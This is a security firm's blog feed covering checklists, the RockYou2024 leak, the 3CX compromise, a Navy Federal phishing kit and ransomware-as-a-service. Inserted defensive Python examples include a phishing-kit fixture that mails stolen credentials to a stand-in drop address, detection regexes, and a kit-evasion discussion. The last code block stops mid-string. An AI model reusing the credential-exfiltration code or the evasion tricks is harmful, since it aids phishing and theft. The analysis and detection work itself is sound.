Data Breach Archives | CyberMaxx
https://www.cybermaxx.com/resources/category/data-breach/
Assess, Monitor, and Manage
Tue, 07 Oct 2025 20:47:09 +0000

On Demand Webinar: Avoiding Your Worst Day – What Every Business Leader Needs to Know About Cybersecurity
https://www.cybermaxx.com/resources/on-demand-webinar-avoiding-your-worst-day-what-every-business-leader-needs-to-know-about-cybersecurity/
Tue, 07 Oct 2025 20:46:03 +0000

The post On Demand Webinar: Avoiding Your Worst Day – What Every Business Leader Needs to Know About Cybersecurity appeared first on CyberMaxx.


Overview

In this exclusive webinar, CyberMaxx CISO Thomas Pioreck will walk you through a real-world breach scenario—highlighting the critical decisions that can either prevent or escalate a cyber crisis.

Key takeaways:

  • The full impact of cyber-attacks—beyond financial loss
  • How integrated cybersecurity tools can stop threats in their tracks
  • Lessons from organizations that successfully defended against attacks

This session is essential for business leaders, IT professionals, and anyone responsible for safeguarding operations.

Featuring: Lisa Burke, Chief Customer Officer at CyberMaxx | Thomas Pioreck, CISO at CyberMaxx | Lee Crockett, Director of Sales at Advanced Logic
CISO Summer Checklist
https://www.cybermaxx.com/resources/ciso-summer-checklist/
Wed, 25 Jun 2025 12:00:23 +0000

Threat actors know the major holidays and know that most organizations will typically be running on reduced staffing. They know that individuals may not be contactable and that responses to their activities will be slowed. For these reasons, they target these times of year – specifically July 4th – knowing that they will likely have increased success in their operations.

Below we’ve outlined nine activities that should be performed ahead of time to make sure you, your teams, and your organizations are prepared.

#1 Incident Response Plan Review

Review the IR SOP (incident response standard operating procedure) and ensure the details are correct and up to date. Identify ahead of time who will be available and reachable during the holidays, and rehearse before the time off. Do a test run: can everyone be contacted and join a bridge within your required timeframe? If not, plan around this now. An escalation tree is worthless if it cannot be executed correctly.

#2 Supply Chain Review

Review vendors whose products or services operate in your environment. This extends to both hardware and service offerings. Do they match your organization’s security standards? We have seen an increasing number of attacks that target service vendors year-on-year.

#3 Penetration Test

When was your last offensive engagement? Have you reviewed the findings and completed the recommended actions? Focus on architectural changes: minimizing the attack surface can provide more breathing space before you have to coordinate a threat response.

#4 Network Assessment

Can you answer the following questions?

  • Do you have in-depth visibility into your network?
  • What does your current inventory look like?
  • Can you quarantine a threat quickly and reactively?
  • Do you have EDR (Endpoint Detection and Response)?
  • Who can access your network? Do you have a BYOD (bring your own device) policy? If so, do you have NAC (network access controls) in place? What about mobile devices?
  • Do you have failover in place in the event a critical asset is taken offline?

Attackers thrive in blind spots in your network. Be sure to include printers, VoIP, IoT devices, and cloud in this review.

#5 & #6 Vulnerability Assessment + Patch Management

This is a broad area and requires the following to complete effectively:

  • Visibility into your network
  • Vulnerability Assessment of exposed assets

Where are you most vulnerable? What can you patch today? What are your most critical vulnerabilities? Are you up to date? There could be a potential chain of vulnerabilities that may lead to widespread impact.

Do you have public-facing assets, and if so, can you coordinate a patch for a zero-day within 24 hours? If not, the asset shouldn’t be exposed. There are only two types of vulnerabilities: the ones you know about and the ones you don’t. We are operating on the attacker’s home ground here, and they often have more information than the away team.

#7 Risk Assessment

Complete a risk assessment to answer the following questions:

  • What are the current threats affecting you today – and leading up to the holiday season? This includes both internal and external threats.
  • Who might be targeting your organization? Have they potentially targeted others in the same or a similar industry vertical? Similar industries use similar software, making it easier for an attacker to move rapidly through multiple victims.
  • Have you completed a vulnerability assessment? Is your patch management up to date?

#8 Awareness Training

Are the company staff aware of threats, and what to look for? Put another phishing assessment on the calendar if one hasn’t been completed in the past 90 days. How do your business partners make updates to accounting? Can it be impersonated? These are key training questions that should be reviewed regularly.

#9 Tabletop Exercise / Threat Simulation

With the above in mind, it’s time to put it all together. Create a tabletop (or work with your security vendor) to simulate a recent and relevant threat to your organization. Can the appropriate parties join a war room to respond to this threat without prior notice? How long does it take your security team to detect this threat? Simulate a response by quarantining the machine and performing threat eradication.

The goal here is to work through PICERL (preparation, identification, containment, eradication, remediation, lessons learned); the tabletop is testing your preparedness ahead of an active incident.

RockYou2024 Password List
https://www.cybermaxx.com/resources/rockyou2024-password-list/
Tue, 09 Jul 2024 18:29:19 +0000

In 2023, the RockYou2023 list contained over 8 billion passwords. This week, an additional 2 billion unique entries were added to this list, and the result has been dubbed RockYou2024.

Discovery and Initial Findings

The leak was identified by CyberNews, who traced the upload to a user posting under the pseudonym “ObamaCare”. The leaked data appeared in a dump on underground forums, prompting immediate action by the researchers.

Sample data from earlier leaks matches passwords contained in this new list, confirming that the list is in fact made up of legitimate data.

“Xmas came early this year,” posted user “ObamaCare” on the forum.

Impact on Users and Organizations

This list represents a large volume of passwords that are in active use. Organizations should also expect brute-force attempts and, most likely, updated password-spraying attempts that use this new list. Users with weak passwords and no further protections will continue to fall victim to drive-by attacks.

One of the largest benefits of lists like this to an attacker is the frequency data on commonly used passwords, which lets a threat actor achieve a greater success rate with fewer guesses. Recent high-use passwords typically follow formats such as “seasonYear”, e.g. Summer2024.

Recommendations for Staying Protected and Moving Forward

Organizations that have not yet implemented multi-factor authentication (MFA) or other identity protection measures are at increased risk of compromise as a result of this updated list.

Ensuring that strong passwords are in use and have not been reused across the organization is critical, and equally important is implementing MFA so that a leaked password alone is not enough for an attacker to succeed.
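As an added example (not code from the original post), the Python below screens a candidate password the way a list like this makes necessary: it rejects the “seasonYear” family the post describes (generalized to any season, a two- or four-digit year and a trailing symbol) and checks the candidate against a corpus of SHA-1 breach digests using the 5-character prefix range lookup style popularized by Have I Been Pwned. The sample corpus, the 12-character minimum and the `screen_password` name are assumptions.

```python
"""Password screening against a breached-password corpus (added example).

Rejects the 'seasonYear' family that the RockYou lists make cheap to spray
(generalized here to any season, 2- or 4-digit year and a trailing symbol)
and checks candidates against a local corpus of SHA-1 digests using the
5-hex-character prefix range lookup style popularized by Have I Been Pwned,
so a full digest never has to leave the host that holds the secret.
"""
import hashlib
import re
from typing import Iterable, List, Set

# Assumed policy threshold; the post only asks for "strong" passwords.
MIN_LENGTH = 12

# Season + optional separator + 2- or 4-digit year + up to two symbols,
# e.g. Summer2024, Winter25!, fall_2023, Spring-24?. Case-insensitive.
SEASON_YEAR_RE = re.compile(
    r"^(?:spring|summer|autumn|fall|winter)[._-]?(?:19|20)?\d{2}[!@#$%^&*.?]{0,2}$",
    re.IGNORECASE,
)


def sha1_hex(password: str) -> str:
    """Uppercase hex SHA-1, the digest form breach corpora are distributed in."""
    return hashlib.sha1(password.encode("utf-8")).hexdigest().upper()


def load_breach_corpus(plaintexts: Iterable[str]) -> Set[str]:
    """Build a digest corpus from leaked plaintexts (constructed sample data).
    A real deployment would load a published digest file instead."""
    return {sha1_hex(p) for p in plaintexts}


def range_lookup(prefix: str, corpus: Set[str]) -> List[str]:
    """Return the digest suffixes of every entry sharing a 5-char prefix.
    This is the only query the screening side needs to send across a trust
    boundary: the prefix identifies a bucket, never a single password."""
    if len(prefix) != 5:
        raise ValueError("prefix must be exactly 5 hex characters")
    prefix = prefix.upper()
    return sorted(h[5:] for h in corpus if h.startswith(prefix))


def is_breached(password: str, corpus: Set[str]) -> bool:
    digest = sha1_hex(password)
    return digest[5:] in range_lookup(digest[:5], corpus)


def screen_password(candidate: str, corpus: Set[str]) -> List[str]:
    """Return the reasons to reject `candidate`; an empty list means accepted."""
    reasons: List[str] = []
    if SEASON_YEAR_RE.match(candidate):
        reasons.append("season+year pattern")
    if len(candidate) < MIN_LENGTH:
        reasons.append(f"shorter than {MIN_LENGTH} characters")
    if is_breached(candidate, corpus):
        reasons.append("present in breach corpus")
    return reasons


# Constructed stand-in for a breach list; a real corpus has billions of entries.
SAMPLE_CORPUS = load_breach_corpus(["Summer2024", "password", "Welcome1!", "Spring2023!"])

if __name__ == "__main__":
    for pw in ["Summer2024", "Winter25!", "Welcome1!", "correct horse battery staple"]:
        verdict = screen_password(pw, SAMPLE_CORPUS) or ["accepted"]
        print(f"{pw!r}: {', '.join(verdict)}")
```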

CISO Holiday Checklist
https://www.cybermaxx.com/resources/ciso-holiday-checklist/
Thu, 07 Dec 2023 13:00:11 +0000

Threat actors know the major holidays and know that most organizations will typically be running on reduced staffing. They know that individuals may not be contactable and that responses to their activities will be slowed. For these reasons, they target these times of year – specifically New Year, Christmas, July 4th, and Thanksgiving – knowing that they will likely have increased success in their operations.

Below we’ve outlined nine activities that should be performed ahead of time to make sure you, your teams, and your organizations are prepared.

#1 Incident Response Plan Review

Review the IR SOP (incident response standard operating procedure) and ensure the details are correct and up to date. Do a test run: can everyone be contacted and join a bridge within your required timeframe? If not, plan around this now. An escalation tree is worthless if it cannot be executed correctly.

#2 Supply Chain Review

Review vendors whose products or services operate in your environment. This extends to both hardware and service offerings. Do they match your organization’s security standards? We have seen an increasing number of attacks that target service vendors year-on-year.

#3 Penetration Test

When was your last offensive engagement? Have you reviewed the findings and completed the recommended actions? Focus on architectural changes: minimizing the attack surface can provide more breathing space before you have to coordinate a threat response.

#4 Network Assessment

Can you answer the following questions?

  • Do you have in-depth visibility into your network?
  • What does your current inventory look like?
  • Can you quarantine a threat quickly and reactively?
  • Do you have EDR (Endpoint Detection and Response)?
  • Who can access your network? Do you have a BYOD (bring your own device) policy? If so, do you have NAC (network access controls) in place? What about mobile devices?
  • Do you have failover in place in the event a critical asset is taken offline?

Attackers thrive in blind spots in your network. Be sure to include printers, VoIP, IoT devices, and cloud in this review.

#5 & #6 Vulnerability Assessment + Patch Management

This is a broad area and requires the following to complete effectively:

  • Visibility into your network
  • Vulnerability Assessment of exposed assets

Where are you most vulnerable? What can you patch today? What are your most critical vulnerabilities? Are you up to date? There could be a potential chain of vulnerabilities that may lead to widespread impact.

Do you have public-facing assets, and if so, can you coordinate a patch for a zero-day within 24 hours? If not, the asset shouldn’t be exposed. There are only two types of vulnerabilities: the ones you know about and the ones you don’t. We are operating on the attacker’s home ground here, and they often have more information than the away team.

#7 Risk Assessment

Complete a risk assessment to answer the following questions:

  • What are the current threats affecting you today – and leading up to the holiday season? This includes both internal and external threats.
  • Who might be targeting your organization? Have they potentially targeted others in the same or a similar industry vertical? Similar industries use similar software, making it easier for an attacker to move rapidly through multiple victims.
  • Have you completed a vulnerability assessment? Is your patch management up to date?

#8 Awareness Training

Are the company staff aware of threats, and what to look for? Put another phishing assessment on the calendar if one hasn’t been completed in the past 90 days. How do your business partners make updates to accounting? Can it be impersonated? These are key training questions that should be reviewed regularly.

#9 Tabletop Exercise / Threat Simulation

With the above in mind, it’s time to put it all together. Create a tabletop (or work with your security vendor) to simulate a recent and relevant threat to your organization. Can the appropriate parties join a war room to respond to this threat without prior notice? How long does it take your security team to detect this threat? Simulate a response by quarantining the machine and performing threat eradication.

The goal here is to work through PICERL (preparation, identification, containment, eradication, remediation, lessons learned); the tabletop is testing your preparedness ahead of an active incident.

Threat Alert: 3CX Suffers a Supply Chain Compromise Affecting Its Desktop Application
https://www.cybermaxx.com/resources/threat-alert-3cx-suffers-a-supply-chain-compromise-affecting-its-desktop-application/
Thu, 30 Mar 2023 14:47:45 +0000

What Happened

Recently, 3CX – a renowned VoIP provider – experienced a supply chain breach with a significant impact on its desktop application. Reports indicate that one of the libraries used in the 3CXDesktopApp was compromised, enabling malicious activity to take place. This was brought to light in a post by Crowdstrike on March 29th, 2023. 3CX has since confirmed that its desktop application was compromised via an infected library used by the app.

Crowdstrike detected what it refers to as “hands-on-keyboard” activity in a small number of cases, suggesting that rather than relying solely on automated tooling, the perpetrator was operating manually. Crowdstrike also reported seeing second-stage payloads downloaded in some cases, but the specifics are unknown at this time.

This incident highlights the growing danger of supply chain attacks, in which an attacker targets a third-party component or service used by the intended victim rather than the victim directly. Such attacks can be hard to detect because they give the attacker access to the victim’s systems via an apparently legitimate route.

While it is unknown exactly how the attackers gained access, it is clear that other firms may also have been affected by the same attack vector. Companies should take all possible measures to verify the safety of their third-party services and components to better protect themselves from such threats.

Who’s Responsible

Currently, there is no confirmed source of the attack. However, ransomware groups are a likely culprit, given their prior attacks on supply chains and third-party components. This incident demonstrates the significant risk that ransomware poses to organizations and the need for strong cybersecurity measures to guard against these kinds of intrusions.

What We’re Doing

CyberMaxx has been actively blocking the domains provided by Crowdstrike since yesterday’s (3/29) announcement.

CyberMaxx searched existing EDR customers for the indicators provided by Crowdstrike after the information became available (3/29).

What You Should Do

Companies should check their logs for connections to the domains listed by Crowdstrike. If you are using the 3CXDesktopApp, 3CX has recommended that the client be uninstalled and replaced with a new client; contact 3CX support if you need guidance. If your company has an MDR service provider, contacting them immediately is also recommended.

Threat Research Series: Investigating a Phishing Campaign Targeting Users of the Navy Federal Credit Union
https://www.cybermaxx.com/resources/threat-research-series-investigating-a-phishing-campaign-targeting-users-of-the-navy-federal-credit-union/
Tue, 07 Mar 2023 06:01:55 +0000

CyberMaxx Threat Research Series

In order to help foster collective intelligence among the cybersecurity community, CyberMaxx publishes insights and examples of active phishing kits uncovered during our threat research. We believe that by sharing the intelligence available to us with the broader cybersecurity community, organizations can more effectively stay ahead of the ever-evolving threats we all face.

In this series, we will largely be documenting some of the research we have done into how common criminals are also victimizing the general public, a topic often ignored by the industry.

These posts are meant to be educational and informative. In no way are they commenting on the teams and organizations that were targeted. Everyone is under attack. These threats negatively impact the operations of corporations and government entities as well as the lives of innocent consumers.

The CyberMaxx Offensive Security team uncovers these in our routine threat research, not during specific client engagements.

Investigating a Phishing Campaign Targeting Users of the Navy Federal Credit Union

During one of our campaigns of collecting data on phishing kits, we came across one targeting users of the Navy Federal Credit Union.

Let us walk you through the flow of the scam.

When you click on the malicious link, you get served a rather decent simulacrum of the Navy Federal login page.

Can you tell the difference between these two screenshots?

[Screenshots: the phishing page next to the real Navy Federal login page]

When you are served the login page, it obviously requests you to log in.

So of course, we log in, twice. It tells us to enter our username and password twice. This is really common in these phishing kits.


We then get asked to enter our email and password – twice.


Now they have our login, password, our email, and our password.

But wait, these crooks want more!

Let’s give them our SSN and some other personal information.


Now, because we are feeling really generous, we give them our credit cards.


And we give them our security questions. Just in case they still are having a hard time defrauding us.


Finally, to allay suspicion after handing over pretty much every piece of PII imaginable, we get redirected to the real Navy Federal homepage.


So, to wrap up the “scam walkthrough” section, this kit steals the following information:

  • Usernames for Navy Federal
  • Passwords for Navy Federal
  • Email Address
  • Password
  • Address
  • Telephone Number
  • Social Security Number
  • MMN (Military Member Number?)
  • Driver’s Licence Expiry Date
  • Driver’s Licence State of Issue
  • Credit Card Number
  • CVV Number
  • Credit Card Expiry Number
  • Questions and Answers for Security Questions

That is quite a lot of data to lose to some stupid PHP script. I’d suggest it is more than enough for a scammer to do a lot of damage to you.

Now, about those PHP scripts. We managed to recover the “phishing kit” package as a ZIP file from the compromised webserver being used to host the phishing site.

After unpacking the phishing kit, we see it has the below structure.

[Screenshot: directory listing of the unpacked phishing kit]

The files “index.php”, “quest.php”, “quest2.php” and “account.php” all simply display various HTML pages that send POST data to “next.php”. They also all include the “includes/antibot.php” file.

The “css” and “images” directories just contain CSS and images required to display the logos, formatting, etc.

Of the PHP files, the three of interest are “email.php”, “next.php”, and “includes/antibot.php”.

The file “email.php” simply defines an email address for logs to be sent to, and a URL for victims to be redirected to – the legitimate Navy Federal website.

[Screenshot: email.php]

The “next.php” file is somewhat interesting: it contains the functions that handle sending the submitted data to the scammer’s email account.

[Screenshot: next.php]

I don’t know who “VeNzA” is, but they seem to be quite a prolific creator of scampages based on a cheeky Google search.

The “includes/antibot.php” page is actually more interesting. It seems to exist to try to prevent web scrapers and scanners run by people like us from finding the kit. It blocks based on IP addresses and user agents.

For readability, here is a screenshot of the script with most of the “blocked” IPs and user agents deleted.

Note its use of wildcards/regular expressions in the IP addresses to block entire IP ranges, and that it checks for substrings in the User-Agent header to block user agents it doesn’t like.

Also worth noting: when it blocks you, it appends your user agent, IP address, and a date stamp to a logfile.

I might even speculate this is a way for the phishers to expand their blocklists – kind of a hostile threat intelligence, where silly whitehats are the threats.

[Screenshot: includes/antibot.php, with most blocked IPs and user agents removed]

Overall, this kit is pretty tragically simple. For each “page” of information the victim supplies, the scammer gets an email. It is pretty much identical to a few other phishing kits we will be showing here – however this one does have the twist of having a rudimentary “anti-security researcher” protection to avoid being detected by web scanners/scrapers.

A future blog post will cover these “anti-whitehat” mechanisms in greater detail, as we have found several variations on the same theme, and they all are pretty interesting.

Borrowing some ideas from them could even be of value to red teams in avoiding their payloads getting ruined by antivirus companies and such.
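The kit’s moving parts described above, triaged statically, as an added example that is neither the kit’s code nor anything from the original post: the Python below pattern-matches an unpacked kit’s PHP sources for the mail() exfiltration, the redirect to the legitimate site, and an antibot gate that checks IP wildcards and User-Agent substrings and logs the visitors it blocks. The indicator regexes, the `triage_kit` name and the sample kit (TEST-NET IP wildcards, an `example.invalid` drop address) are constructed assumptions, not values from the recovered kit.

```python
"""Static triage of a recovered phishing kit (added example, not kit code).

Nothing here executes the kit. It pattern-matches the unpacked PHP sources for
the traits described in the post: form data mailed to the operator, a redirect
to the legitimate site after the last page, and an "antibot" gate that blocks
on IP wildcards and User-Agent substrings and logs the visitors it turns away.
"""
import json
import re
from typing import Any, Dict, List, Tuple

# Quoted wildcard IP literals such as '203.0.113.*' (block an entire range).
IP_WILDCARD_RE = re.compile(r"['\"]((?:\d{1,3}\.)+\*(?:\.\*)*)['\"]")
EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+")

# Assumed indicators derived from the post's description, not vendor signatures.
INDICATORS: List[Tuple[str, re.Pattern]] = [
    ("exfil_by_mail", re.compile(r"\bmail\s*\(", re.IGNORECASE)),
    ("reads_form_data", re.compile(r"\$_POST\s*\[")),
    ("redirect_to_legit_site", re.compile(r"header\s*\(\s*['\"]Location:", re.IGNORECASE)),
    ("ua_gate", re.compile(r"HTTP_USER_AGENT")),
    ("ip_gate", re.compile(r"REMOTE_ADDR")),
    ("ip_wildcard_list", IP_WILDCARD_RE),
    ("writes_visitor_log", re.compile(r"\b(?:fopen|fwrite|file_put_contents)\s*\(")),
]


def scan_file(path: str, source: str) -> Dict[str, Any]:
    """Collect indicator hits and extractable values for one source file."""
    return {
        "path": path,
        "indicators": [name for name, rx in INDICATORS if rx.search(source)],
        "emails": sorted(set(EMAIL_RE.findall(source))),
        "ip_wildcards": IP_WILDCARD_RE.findall(source),
    }


def triage_kit(files: Dict[str, str]) -> Dict[str, Any]:
    """Summarize a kit given {relative path: source text}."""
    per_file = {path: scan_file(path, src) for path, src in files.items()}
    hits = {path: set(r["indicators"]) for path, r in per_file.items()}
    # The exfil path is a file that both reads POSTed fields and calls mail().
    exfil_files = sorted(p for p, h in hits.items() if {"reads_form_data", "exfil_by_mail"} <= h)
    # The antibot gate is a file that inspects both the client IP and User-Agent.
    gate_files = sorted(p for p, h in hits.items() if {"ua_gate", "ip_gate"} <= h)
    return {
        "verdict": "phishing_kit" if exfil_files else "inconclusive",
        "exfil_files": exfil_files,
        "exfil_addresses": sorted({e for r in per_file.values() for e in r["emails"]}),
        "antibot_files": gate_files,
        # Only count the log write if it sits in the gate file, as in the post.
        "logs_blocked_visitors": any("writes_visitor_log" in hits[p] for p in gate_files),
        "blocked_ip_patterns": [w for p in gate_files for w in per_file[p]["ip_wildcards"]],
        "files": per_file,
    }


# Constructed stand-in for an unpacked kit; the shapes mirror the post's description,
# with TEST-NET addresses and an .invalid drop address instead of real values.
SAMPLE_KIT: Dict[str, str] = {
    "index.php": "<?php include 'includes/antibot.php'; ?>\n"
                 "<form method=\"post\" action=\"next.php\"> ... </form>\n",
    "email.php": "<?php\n$email = 'drop@example.invalid';\n"
                 "$redirect = 'https://legit-site.example/';\n",
    "next.php": "<?php include 'email.php';\n"
                "$msg = 'User: ' . $_POST['user'] . ' Pass: ' . $_POST['pass'];\n"
                "mail($email, 'Result', $msg);\n"
                "header('Location: ' . $redirect);\n",
    "includes/antibot.php": "<?php\n$bannedIP = array('203.0.113.*', '198.51.100.*');\n"
                            "$bannedUA = array('googlebot', 'crawler');\n"
                            "$ip = $_SERVER['REMOTE_ADDR'];\n"
                            "$ua = $_SERVER['HTTP_USER_AGENT'];\n"
                            "// ... range and substring matching omitted ...\n"
                            "if ($blocked) { $f = fopen('bots.txt', 'a');\n"
                            "  fwrite($f, $ua . ' ' . $ip . ' ' . date('Y-m-d')); exit; }\n",
}

if __name__ == "__main__":
    report = triage_kit(SAMPLE_KIT)
    print(json.dumps({k: v for k, v in report.items() if k != "files"}, indent=2))
```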

What is Ransomware as a Service (RaaS)?
https://www.cybermaxx.com/resources/what-is-ransomware-as-a-service-raas/
Mon, 30 Jan 2023 06:01:31 +0000

Ransomware has been a big problem for businesses in recent years, especially with the rise of remote and hybrid working brought about by the COVID-19 pandemic. This has made it harder for businesses to protect their data and systems from attack.

With a 13% increase from 2021 to 2022, equal to the past five years’ increases combined (Verizon DBIR), there are no signs that these attacks are going anywhere, and organizations and individuals need to be more vigilant than ever before.

What is RaaS

Extortion or Ransomware as a Service (RaaS) can be thought of as a variant of the popular Software as a Service (SaaS) model: users who may not have the time or skill to create and deploy their own ransomware purchase it on the dark web to infect their victims.

The RaaS comes as a kit that is distributed to affiliates and each kit has different features and benefits. Some RaaS kits can include 24/7 support, user reviews, forums, and even offers to bundle services. Prices for a RaaS kit can range significantly from $40 a month to thousands depending on the kit needed. The average ransom demand in 2021 was $6 million.

How Does It Work

The RaaS model follows this outline for operators and affiliates.

RaaS Operators:

  • Recruit affiliates on forums and the dark web
  • Give affiliates access to “build your own ransomware package” tooling
  • Provide a command and control dashboard to track the status of the package
  • Set up the victim payment portal
  • Assist with victim negotiations
  • Manage a dedicated leak site

RaaS Affiliates:

  • Pay to use the ransomware
  • Agree on the fee per collected ransom
  • Target victims
  • Set ransom demands
  • Create post-attack user messages
  • Compromise the victims
  • Execute the ransomware
  • Communicate with victims via chat portals or other channels
  • Manage decryption keys

Four common RaaS models:

  • Monthly subscription for a flat fee
  • Affiliate programs, which are the same as the monthly fee model but with a percentage of the profits (typically 20-30%) going to the ransomware developer
  • One-time license fee with no profit sharing
  • Pure profit sharing

RaaS is a quick and straightforward way to monetize malware. Through some refined RaaS portals, affiliates can create an account, pay with Bitcoin, monitor infection status and the files encrypted, scan their targets, and start making money. Ransomware providers offer a wide range of support options, from online communities, tutorials, and documentation to feature updates and other benefits, just like a traditional SaaS product.

Examples

CyberMaxx engineers have flagged the following RaaS operations as noteworthy so far this year.

LockBit

LockBit has proven itself to be the world’s most prominent and active ransomware, more than doubling the average ransomware payment by targeting small-to-medium-sized organizations. Dubbed one of the most destructive pieces of software in modern history, LockBit encrypts nearly every file stored on an infected device and drops corresponding ransom notes on victims’ computers.

BlackCat

BlackCat is a notable ransomware family threatening users worldwide with a distinctive set of features: it is a possible rebranding of DarkSide, it is written in Rust (a more secure programming language that offers improved performance and reliable concurrent processing), it pays affiliates a comparatively larger share than similar schemes, and it launched one of the first public data leak sites.

Black Basta

Black Basta was only noticed in April 2022 but has become a major player in the RaaS business by using double extortion tactics and attack tools like the QakBot trojan and PrintNightmare exploit.

This ransomware family had multiple successful high-profile attacks back to back:

Black Basta shows no signs of slowing down. In June 2022 they released a new build to their ransomware stack that is designed to infect VMWare ESXi virtual machines.

Monti

Monti is a relatively new ransomware that is thought to be the same or a rebrand of the Conti ransomware group. Monti encrypts files on Linux systems and possibly now Windows and uses the extension “.puuuk”. Another characteristic of Monti is they operate two separate TOR sites: one for hosting data stolen from victims and another for ransom negotiation.

Currently, the data leak website shows that almost all of the victims have paid their ransoms with the exception of one from Argentina.

Preventing RaaS

In order to help prevent becoming a victim of a RaaS attack, organizations need to develop a robust plan for data security in order to combat the growing trend of ransomware. Since RaaS is so costly to recover from, organizations should consider leveraging solutions designed to detect and prevent threats.

CyberMaxx has identified the following best practices for preventing RaaS:

  • Reliable endpoint protection that works in the background 24/7 and can decipher complex algorithms
  • Back up systems and devices regularly (a few times a week)
  • Validate that the backups are working and test the backup/recovery process
  • Ensure backups are immutable
  • Store multiple backups in various locations
  • Maintain a patch program for vulnerabilities
  • Anti-phishing protection
  • Train employees and improve security culture

Conclusion

With RaaS being an extremely lucrative business (revenues in 2021 were $20 billion), there is no doubt that we will continue to see it used more, especially with ransomware attacks rising by 13% that same year.

There are many things an organization can do to protect against ransomware, but experts recommend being proactive, monitoring continuously, and automating responses to the related and enabling stages of an attack (such as phishing). Automation matters because modern malware moves at machine speed, and only machine-speed response can keep up.

Vulnerability and security incident management solutions help security, risk, and IT teams focus by providing playbooks that prioritize and direct action. Centralized data collection, analytics, and AI-assisted triage make that work less onerous, error-prone, and expensive.

Organizations can use these systems to anticipate what matters most to their business or mission, reduce exposure through better processes, and react quickly when problems arise, avoiding potential incidents and keeping operations running smoothly.

As ransomware attacks continue to grow, it is more important than ever for organizations to have a well-orchestrated IT security infrastructure in place. By doing so, they will be better equipped to weather any malicious attack with less cost and disruption.

The post What is Ransomware as a Service (RaaS)? appeared first on CyberMaxx.

]]>
2022 in Review…well, most of it, a lot happened https://www.cybermaxx.com/resources/2022-in-review-well-most-of-it-a-lot-happened/ Wed, 28 Dec 2022 21:59:59 +0000 https://cybermaxx2021.wpengine.com/?p=5654 With 2023 right around the corner, we at CyberMaxx wanted to recap some of the big events that happened in 2022. Threat actors continue to get smarter and find ways to cause chaos for organizations, but, it’s not all doom and gloom as the good defenders stay one step ahead with people, processes, and technology […]

The post 2022 in Review…well, most of it, a lot happened appeared first on CyberMaxx.

]]>
With 2023 right around the corner, we at CyberMaxx wanted to recap some of the big events that happened in 2022.

Threat actors continue to get smarter and find ways to cause chaos for organizations, but, it’s not all doom and gloom as the good defenders stay one step ahead with people, processes, and technology to help organizations avoid becoming the victim of a breach.

Russia’s Cyber-attacks on Ukraine

Starting the year off, the world saw Russian state-sponsored cyber operations deploy DDoS attacks, SMS spam campaigns, wiper malware, attacks on air traffic control, and Sandworm-attributed malware on Linux systems.

Not stopping there, Russia also targeted Ukrainian military personnel with phishing emails, leveraged the Conti ransomware gang, which publicly sided with Russia, and used a two-component malware called FoxBlade for DDoS attacks.

The list continued throughout the year as the conflict escalated into a full-scale war.

Healthcare is Still a Top Target (And Probably Always Will Be)

The healthcare industry continues to be a top target for cybercriminals, with 849 incidents in the period covered by the Verizon 2022 DBIR, 571 of which resulted in confirmed data disclosure.

Healthcare also remains at #1 for the most costly data breaches among all industries reaching $10.10 million this year and expected to grow year over year for the foreseeable future. (IBM cost of a data breach)

The list is extensive for individual organizations that were affected by cyberattacks this year so we will only go over a few in no particular order:

  • Eye Care Leaders (ECL) – ECL experienced the largest and most headline-grabbing healthcare breach reported this year, with approximately 3.6 million patients affected. The ransomware attack drew additional scrutiny because of when the vendor reported it: several providers sued the practice management system vendor for “concealing” multiple ransomware attacks and related outages. ECL did notify the affected providers, but not within the timeframe HIPAA's Breach Notification Rule requires (no later than 60 days after discovery), which in turn led to multiple patient-led lawsuits.
  • Advocate Aurora Health – In late October, Advocate Aurora disclosed that protected health information had been sent to Google and Facebook through tracking pixels embedded in its patient portals, website, and applications. The pixels have since been removed, but not before the IP addresses, insurance information, proxy names, locations, procedure types, and appointment times of almost 3 million patients were exposed. Advocate Aurora is currently defending itself against multiple class action lawsuits over the pixel disclosure.
  • Connexin Software – Connexin Software, a pediatric electronic medical records and practice management software vendor, disclosed in early December a network intrusion and data theft affecting 119 provider offices and some 2.2 million patients. The threat actor gained access to an offline set of patient data used for troubleshooting and exfiltrated it. Data stolen includes names, contact details, SSNs, guarantor names, parent or guardian names, dates of birth, detailed health insurance information, treatments, procedures, diagnoses, prescriptions, provider names, medical record numbers, and billing and/or claims data.
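The Advocate Aurora case is instructive because nobody broke in: the data left through scripts and pixels the site itself loaded. The check a practitioner wants is an inventory of every third-party host a page causes the browser to contact. The script below is an added example (not CyberMaxx's code, and not anything from Advocate Aurora's remediation) that parses an HTML page, lists every script, image, or iframe loaded from outside the site's own domain, flags hosts on a tracker list, and also catches inline pixel snippets (fbq/gtag calls) that have no src attribute. The sample page, the site domain portal.example.org, and the tracker host list are all constructed for the example; the host list is illustrative, not authoritative.

```python
"""Audit a web page for third-party tracking pixels and scripts (added example)."""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Illustrative hosts associated with advertising/analytics tracking (assumption:
# build and maintain your own list from an inventory of approved third parties).
KNOWN_TRACKER_HOSTS = {
    "connect.facebook.net",
    "www.facebook.com",
    "www.googletagmanager.com",
    "www.google-analytics.com",
}

# Inline JavaScript markers indicating a pixel is initialised in-page.
INLINE_MARKERS = ("fbq(", "gtag(", "ga(")

# Tag -> attribute that triggers a network request when the page renders.
LOADING_ATTRS = {"script": "src", "img": "src", "iframe": "src"}


class ThirdPartyLoadParser(HTMLParser):
    def __init__(self, first_party_domain: str):
        super().__init__()
        self.first_party = first_party_domain.lower()
        self.findings = []
        self._in_script = False

    def _is_first_party(self, host: str) -> bool:
        return host == self.first_party or host.endswith("." + self.first_party)

    def handle_starttag(self, tag, attrs):
        self._in_script = tag == "script"
        attr = LOADING_ATTRS.get(tag)
        if attr is None:
            return
        src = dict(attrs).get(attr)
        if not src:
            return
        host = urlparse(src).hostname
        if host is None or self._is_first_party(host):  # relative or same-site URL
            return
        self.findings.append({"tag": tag, "host": host, "known_tracker": host in KNOWN_TRACKER_HOSTS})

    def handle_data(self, data):
        # Script bodies arrive here; an inline pixel has no src to inspect.
        if self._in_script and any(marker in data for marker in INLINE_MARKERS):
            self.findings.append({"tag": "inline-script", "host": None, "known_tracker": True})

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False


def audit_page(html: str, first_party_domain: str) -> list:
    parser = ThirdPartyLoadParser(first_party_domain)
    parser.feed(html)
    parser.close()
    return parser.findings


def tracker_hosts(findings: list) -> list:
    """Distinct third-party hosts on the tracker list, for a quick summary."""
    return sorted({f["host"] for f in findings if f["known_tracker"] and f["host"]})


# Constructed sample: a patient-portal page as it might look with a pixel installed.
SAMPLE_PORTAL_PAGE = """
<html><head>
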